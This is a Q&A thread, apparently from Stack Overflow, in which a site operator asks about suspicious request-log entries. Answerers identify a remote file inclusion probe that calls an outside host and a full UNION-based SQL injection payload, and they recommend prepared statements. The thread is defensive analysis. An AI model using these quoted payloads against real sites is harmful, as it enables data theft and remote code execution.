# Is this an injection attempt or a normal request?

Tags: php, request, sql-injection

In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:

```
/?x=19&y=15
```

The numbers are random, but its always setting x and y variables.

Another category of mysterious requests:

```
/?id=http://nic.bupt.edu.cn/media/j1.txt??
```

There are other attempts at injections in the request log that have straight sql written into them as well.  Example:

```
 /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--
```

It looks like they are all reaching a 404, but I'm still wondering about the intent behind these.

I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services.  Also, there was a search box installed on the site which could be the reason.

Any suggestions as to what all these are?

---

EDIT

I pulled all of these out of the request lists and sliced off the txt they are pointing to.  Maybe this provides more help as to what kind of attacks these are.

```
http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
http://www.abi.co.uk
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com
```

Also, in phpMyAdmin status section, it shows ~900 change db queries per hour.  Can a user with only select privs do any real damage to the db?  There is no personal info on it, but these SOB's are clogging up the bandwidth.

Comment: http://nic.bupt.edu.cn/media/j1.txt appears to be fairly well known: http://sucuri.net/?page=tools&title=blacklist&detail=803edcd3d2e8b2bb63388a6b2938ac0e

Comment: is there another projecthoneypot.org type site?

Comment: to solve the bandwidth issue, just ban IPs like there's not tomorrow

Comment: In the case of the UNION query, I'd say that, given that they apparently have the name of your public db, it's not an injection attempt, it's an injection success.  Likely all your data is compromised, go back and check the logs (search for UNION, SELECT, etc) to see what information was exposed.  The malicious user doesn't need to have privileges other than SELECT to compromise your data, just to corrupt it.

Comment: Just noticed that you said it has no personal info in it.  OK, well then your data being compromised doesn't hurt much, but you should still fix the small holes at least for best practice's sake.

Comment: @Lo'oris - i plan on it!  @Dereleased - thanks for the advice, but how can it get corrupt via select?

Comment: It can't, sorry if that wasn't clear.  I meant that with select-only permissions they cannot corrupt your data, but they can compromise it.  Worst they can do with select is tie up the system, especially if they can write a ridiculous query that joins to itself several times as a cartesian product.

Answer (score 5, accepted):

These (except for the top one) are automated(?) attempts to find weaknesses in the code;

/?id=http://nic.bupt.edu.cn/media/j1.txt??

Tries to import a PHP page from another server. A well-known problem especially with older PHP software.

The "UNION ALL SELECT 1" is an obvious SQL insertion attempt. schema ID 0x73636363726F6F745F7075626C6963 decodes to "scccroot_public". I'm not sure for which database this is. But they are trying to take control of it, that's sure.

Comment: awesome, thanks for the info... scccroot_public is our public db and we only have a user with select privs.... will this person/bot still be able to claim itself as a dba?

Comment: One of the interesting things to note about this UNION query is that it apparently only works because you have a query where you check for a number without using quotes.  If you always surround arguments to be checked with quotes, along with proper data escaping and sanitization (such as `mysql_real_escape_string()`), then you shouldn't be vulnerable to this sort of thing.  As it stands, though, without using quotes around the numerical argument in your query, even running a typical sanitization routine like mysql_real_escape_string won't help.

Comment: really you should be using prepared statements, not quoting everything

Comment: @rmeador - its not my site, but thats what i suggested we do

Comment: There's plenty of moronic unzip-and-get-pwned templating scripts out there. Most likely one (or more) has a `<?php include($_GET['id']) ?>` construct in it for which this attacker is probing.

Answer (score 4):

The `x=19&y=15` looks like you have a form on your site with `method=get` and an input `type=image`. Do you log referrer?

Comment: We have forms, but not off the root path like that.... unless our web guy has experiments laying around.  i dont think that any of the forms have image types, but thanks for the info.  we do log referrer, but i am still looking for that because im locked out of aw stats in cpanel

Comment: Whatever it seems pretty innocuous compared to the other 2 entries!

Answer (score 3):

`/?x=19&y=15` could represent an [`<input type="image" />`](http://www.w3.org/TR/html401/interact/forms.html)

Answer (score 0):

/?id=http://nic.bupt.edu.cn/media/j1.txt?? looks like some sort of cross-site stuff, a useless one because it loads a plain text file O_O

Comment: aren't all our scripts a text files too?

Comment: The php scripts are text files as many others. The thing is: that particular request points to a plain text file which is not *executed* by any browser, plugin or application (besides gedit or notepad... or shown by the browser as a sequence of characters disposed in a certain order).